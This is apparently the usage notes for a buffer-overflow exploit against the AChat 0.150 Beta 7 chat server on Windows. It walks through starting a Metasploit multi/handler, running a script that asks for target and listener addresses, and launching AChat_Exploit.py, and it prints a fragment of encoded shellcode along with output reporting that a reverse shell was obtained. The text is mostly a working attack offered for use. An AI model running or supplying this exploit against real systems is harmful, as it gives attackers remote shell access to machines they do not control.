Tested on AChat 0.150 Beta 7 Windows 7/8/10 x86/x64
Example: https://youtu.be/YgC_Rl6x3aM
You must use the MSF multi/handler to capture the shell
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.206:4443
root@omen:~#./AChat_Payload.sh
RHOST: $ENTER YOUR TARGET
LHOST: $ENTER YOUR LOCAL HOST
LPORT: $ENTER YOUR LISTENING PORT FOR MSFCONSOLE (DEFAULT IS 4444)
buf = "" buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
root@omen:~#python AChat_Exploit.py
[+] BUFFER OVERFLOW PAYLOAD RELEASED -- CHECK YOUR HANDLER
If you check your handler. You should have a shell.